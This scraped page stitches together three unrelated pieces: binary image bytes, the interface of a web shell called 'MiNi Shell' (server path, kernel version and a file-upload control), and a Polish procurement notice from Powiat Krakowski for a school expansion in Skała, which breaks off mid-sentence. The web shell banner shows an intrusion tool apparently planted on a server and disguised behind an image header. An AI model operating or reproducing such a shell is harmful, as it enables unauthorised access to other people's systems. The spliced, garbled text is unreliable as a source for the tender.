JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220112/0001338101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa Zespołu Szkół i Placówek Oświatowych w Skale - tryb zaprojektuj i wybuduj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Krakowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351554413</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Słowackiego 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-037</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 634 42 66</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 633 52 94</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zarzad@powiat.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa Zespołu Szkół i Placówek Oświatowych w Skale - tryb zaprojektuj i wybuduj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fe120c0f-6721-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00013381</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/spwk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony prowadzonego<br/>postępowania: https://portal.smartpzp.pl/spwk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Za<br/>pośrednictwem posiadanego w Systemie konta Użytkownika Zewnętrznego, tj. wykonawcy, odbywa się<br/>komunikacja Wykonawcy z Zamawiającym w postępowaniu, w szczególności: przekazywanie<br/>dokumentów, oświadczeń, informacji, wniosków w ramach postępowania.<br/>2. Zadawanie pytań do dokumentów zamówienia przez Wykonawców odbywa się w zakładce &#34;Pytania<br/>do postępowania&#34; i nie wymaga zakładania konta.<br/>3. Po otwarciu ofert komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie<br/>oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej<br/>(opatrzone podpisem kwalifikowanym) lub w postaci elektronicznej opatrzone podpisem zaufanym lub<br/>podpisem osobistym za pośrednictwem Systemu, w zakładce &#34;Korespondencja&#34;, która dla Wykonawcy<br/>jest widoczna w Zakładce &#34;Oferty&#34;, po zaznaczeniu numeru złożonej oferty.<br/>4. Z Systemu można korzystać na dwa sposoby, pod warunkiem spełnienia następujących<br/>minimalnych wymagań technicznych:<br/>a) oprogramowanie zewnętrzne (dostawcy podpisu kwalifikowanego):<br/>• przeglądarka internetowa: Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze<br/>lub Opera ver. 58 i późniejsze, Microsoft Edge ver. 18 i późniejsze, Internet Explorer 11,<br/>• lista zalecanych przeglądarek internetowych: Google Chrome, Mozzilla Firefox, Opera. Zaleca się<br/>używanie najnowszych wersji przeglądarek.<br/>• System operacyjny: Windows 7 i późniejsze.<br/>b) Oprogramowanie wbudowane w SmartPZP:<br/>• zainstalowane środowisko JAVA w wersji min. 1.8 (jre),<br/>• w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki<br/>Szafir SDK Web,<br/>• oprogramowanie SzafirHost w systemie operacyjnym.<br/>Powyższe wymagania wraz ze szczegółowym opisem znajdują się w Instrukcji użytkownika<br/>Wykonawcy na stronie internetowej: https://portal.smartpzp.pl/spwk/elearning<br/>5. Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej<br/>zapewnionych w Systemie jest uzależnione od uprzedniej akceptacji przez Wykonawcę Regulaminu<br/>korzystania z usług Systemu na witrynie internetowej przy zakładaniu profilu Wykonawcy.<br/>6. Wykonawcy przysługuje prawo korzystania z asysty obejmującej wsparcie techniczne w kwestiach<br/>dotyczących korzystania z Systemu, polegające na doradztwie telefonicznym i e-mailowym na<br/>zasadach określonych w Regulaminie korzystania z usług Systemu. Wykonawcy zobowiązani są do<br/>bieżącego śledzenia ewentualnych zmian technicznych w Systemie.<br/>7. W sytuacji awarii Systemu lub przerwy technicznej działania Systemu Zamawiający dopuszcza<br/>komunikację za pomocą poczty elektronicznej na adres e-mailowy: zp@powiat.krakow.pl (nie dotyczy<br/>składania ofert, które należy złożyć wyłącznie za pośrednictwem systemu).<br/>8. W przypadku przekazywania plików skompresowanych zaleca się podpisanie każdego dokumentu<br/>odrębnie (nie należy podpisywać skompresowanego pliku).<br/>9. W korespondencji związanej z niniejszym postępowaniem wykonawcy powinni posługiwać się<br/>następującym znakiem postępowania: BIR.272.8.2021.<br/>10. Sposób sporządzenia podmiotowych środków dowodowych, przedmiotowych środków<br/>dowodowych oraz innych dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz w<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy.<br/>11. W celu zminimalizowania potencjalnych problemów technicznych z przesyłaniem dokumentów i ich<br/>weryfikacją Zamawiający rekomenduje przesyłanie dokumentów w formacie .pdf<br/>12. Nie przewiduje się innego sposobu komunikowania się z Wykonawcami niż przy użyciu środków<br/>komunikacji elektronicznej, za wyjątkiem sytuacji opisanej w ust. 7.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Dane osobowe w Starostwie Powiatowym w Krakowie są<br/>przetwarzane zgodnie z obowiązującymi przepisami prawa Unii Europejskiej, w szczególności zgodnie<br/>z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych), zwanym dalej „RODO” i przepisami krajowymi z zakresu ochrony danych<br/>osobowych.<br/>2. Administratorem Danych Osobowych jest Powiat Krakowski z siedzibą w Krakowie, Al. Słowackiego<br/>20, 30-037 Kraków, tel. 12-633-49-06, adres e-mail: zarzad@powiat.krakow.pl<br/>3. Administrator powołał Inspektora Ochrony Danych, z którym można kontaktować się telefonicznie<br/>pod numerem (12) 39-79-509 lub wysyłając informację na adres e-mail iod@powiat.krakow.pl<br/>4. Przetwarzanie danych osobowych odbywa się w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego pn. „Rozbudowa Zespołu Szkół i Placówek Oświatowych w Skale – tryb<br/>zaprojektuj i wybuduj&#34;, prowadzonym w trybie podstawowym,<br/>5. Podstawą prawną ich przetwarzania jest Państwa zgoda wyrażona poprzez akt uczestnictwa w<br/>postępowaniu oraz następujące przepisy prawa:<br/>1) ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2021 r., poz.1129 z późn. zm.),<br/>2) Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz.U. z 2020 r., poz. 2415),<br/>3) rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 18 grudnia 2020 r. w sprawie<br/>protokołów postępowania oraz dokumentacji postępowania o udzielenie zamówienia publicznego (Dz.<br/>U.z 2020 r., poz. 2434),<br/>4) rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie ogłoszeń<br/>zamieszczanych w Biuletynie Zamówień Publicznych (Dz. U. z 2020 r., poz. 2439),<br/>5) rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie postępowania przy<br/>rozpoznawaniu odwołań przez Krajową Izbę Odwoławczą (Dz. U. 2020 r., poz. 2453),<br/>6) ustawa o narodowym zasobie archiwalnym i archiwach (t.j. Dz.U. z 2020 r., poz. 164 z późn. zm.).<br/>6. Odbiorcami danych, czyli podmiotami którym dane osobowe będą ujawnione są osoby lub podmioty,<br/>którym udostępniona zostanie dokumentacja postępowania.<br/>7. Dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy, a następnie przez okres 5 lat w Archiwum Zakładowym Starostwa<br/>Powiatowego w Krakowie zgodnie z Jednolitym Rzeczowym Wykazem Akt dla danej grupy archiwalnej<br/>zgodnie z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach oraz<br/>rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów<br/>zakładowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8. W przypadkach określonych przepisami prawa osobie,<br/>której dane są przetwarzane przysługują niżej wymienione uprawnienia:<br/>1) prawo dostępu do danych osobowych, w tym prawo do uzyskania kopii tych danych,<br/>2) prawo do sprostowania (poprawienia) danych osobowych w przypadku, gdy dane są nieprawidłowe<br/>lub niekompletne, przy czym skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia<br/>do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w<br/>sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>3) prawo do ograniczenia przetwarzania, wniesienia sprzeciwu wobec ich przetwarzania, prawo do<br/>przenoszenia danych, prawo do usunięcia danych osobowych (tzw. prawo do bycia zapomnianym),<br/>przy czym w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o<br/>którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych<br/>osobowych do czasu zakończenia tego postępowania.<br/>4) prawo do wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych<br/>Osobowych, gdy przetwarzanie danych osobowych odbywa się z naruszeniem prawa, w tym przepisów<br/>RODO.<br/>9. Podanie danych osobowych jest obowiązkowe w sytuacji, gdy podstawę przetwarzania danych<br/>stanowi przepis prawa lub zawierana między stronami umowa. W takim przypadku niepodanie danych<br/>osobowych uniemożliwi realizację czynności lub usługi, bądź zawarcie umowy.<br/>10. Przy przetwarzaniu danych osobowych Administrator nie stosuje zautomatyzowanego<br/>podejmowania decyzji i profilowania.<br/>11. Zgodnie z treścią art. 18 ust. 6 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j,<br/>Dz. U. z 2021 r., poz. 1129 ze zm.) Administrator udostępnia dane osobowe, o których mowa w art. 10<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z późn. zm.) ), zwanego dalej „rozporządzeniem<br/>2016/679”, w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX<br/>ustawy, do upływu terminu na ich wniesienie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BIR.272.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej koniecznej do budowy<br/>dodatkowego skrzydła połączonego na wszystkich kondygnacjach z budynkiem istniejącym<br/>Zespołu Szkół i Placówek Oświatowych w Skale ul. Ks. Stanisława Połetka 30, 32-043 Skała<br/>oraz wykonanie inwestycji przez Wykonawcę zgodnie z Programem Funkcjonalno – Użytkowym,<br/>dokumentacją projektową, STWIORB i harmonogramem rzeczowo – finansowym realizacji<br/>umowy. Prace będą realizowane w ramach zadania inwestycyjnego o nazwie: „Rozbudowa<br/>Zespołu Szkół i Placówek Oświatowych w Skale – tryb zaprojektuj i wybuduj”. Zamówienie<br/>obejmuje także zakup elementów pierwszego wyposażenia bez zakupu mebli. Nowopowstałe<br/>skrzydło szkoły będzie pełnić funkcję: internatu, schroniska młodzieżowego, sal lekcyjnych, sali<br/>konferencyjnej.<br/>2. Zakres zamówienia będzie obejmował:<br/>1) wykonanie dokumentacji projektowej, w skład której wchodzą m.in. inwentaryzacja<br/>istniejącego budynku w zakresie potrzebnym do realizacji inwestycji, projekt budowlany (wraz z<br/>projektem technicznym), projekt wykonawcy, przedmiary robót, kosztorysy inwestorskie,<br/>aranżacje, projekty mebli oraz specyfikacje techniczne wykonania i odbioru robót oraz plan<br/>BIOZ,<br/>2) uzyskanie wszelkich niezbędnych uzgodnień, opinii i decyzji administracyjnych<br/>warunkujących zrealizowanie prac budowlanych i przekazanie obiektu do użytkowania i jego<br/>eksploatacji,<br/>3) realizację Inwestycji zgodnie z zaakceptowanym przez Inwestora projektem, w tym dostawę i<br/>montaż urządzeń,<br/>4) opracowanie i przekazanie Zamawiającemu kompletnej dokumentacji powykonawczej oraz<br/>instrukcji eksploatacji i konserwacji, instrukcji BHP i p. poż,<br/>5) zapewnienie właściwego oznakowania obiektów instalacji w tym wyposażenie w niezbędne<br/>instrukcje i tablice informacyjne,<br/>6) przeszkolenie personelu Zamawiającego w zakresie obsługi i eksploatacji instalacji,<br/>7) serwisowanie wybudowanego obiektu i urządzeń (w okresie objętym gwarancją) oraz<br/>wykonywanie bezpłatnych przeglądów, zatwierdzonych protokołem. Koszty serwisowania w<br/>okresie gwarancji pokrywa wykonawca,<br/>8) przekazanie Zamawiającemu obiektu do użytkowania.<br/>3. Do przedmiotu zamówienia należy uzyskanie wszystkich niezbędnych z punktu widzenia celu<br/>inwestycji decyzji, w tym pozwolenia na budowę, zgłoszenia robót budowlanych, opinii i<br/>uzgodnień oraz prowadzenie nadzoru i zapewnienie kierownictwa nad robotami we wszystkich<br/>branżach, uzyskanie pozwolenia na użytkowanie, zgodnie z obowiązującymi przepisami.<br/>Inwestycja prowadzona będzie na działce nr 2190/6, obr. 0001 w Skale oraz na działkach, które<br/>będą niezbędne np. ze względu na prowadzenie sieci, przyłączy i infrastruktury technicznej. W<br/>ramach realizacji projektu planuje się:<br/>1) budowę budynku skrzydła pomocniczego wraz z łącznikiem (realizacja łącznika wiąże się<br/>także z przebudową istniejącego głównego budynku),<br/>2) montaż podnośnika schodowego w istniejącej części budynku głównego,<br/>3) budowę budynku/altany jako miejsca gromadzenia odpadów stałych (śmietnika),<br/>4) prace niwelacyjne terenu w tym murków oporowych wraz z niezbędną wycinką zadrzewienia i<br/>krzewów (wycinka drzew i krzewów powinna być zrealizowana w minimalnym stopniu),<br/>5) realizację ciągów pieszych zapewniających korzystanie z nowo projektowanego budynku oraz<br/>budynku istniejącego,<br/>6) realizację terenów utwardzonych,<br/>7) wykonanie i montaż małej architektury,<br/>8) montaż oświetlenia zewnętrznego,<br/>9) budowę/przebudowę niezbędnej infrastruktury technicznej<br/>10) odtworzenie nawierzchni utwardzonych i zielonych.<br/>4. Szczegółowy opis przedmiotu zamówienia zawarty jest w projekcie umowy (zał. nr 12 do<br/>SWZ), opisie przedmiotu zamówienia (zał. nr 13 do SWZ) oraz dokumentacji (zał. 14 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45214200-2 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych ze szkolnictwem</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">600 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielania zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy w wysokości nieprzekraczającej 30% wartości zamówienia podstawowego. Zamówienia<br/>te będą polegały na powtórzeniu podobnych robót budowlanych w stosunku do opisanych w niniejszym<br/>postępowaniu oraz we wzorze umowy. Warunki na jakich będą udzielone ww. zamówienia, będą<br/>odpowiadały warunkom określonym w niniejszym postępowaniu</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Oferty będą oceniane wg następujących kryteriów:<br/>1) Cena brutto w złotych,<br/>2) Doświadczenie kierownika budowy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu, dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych 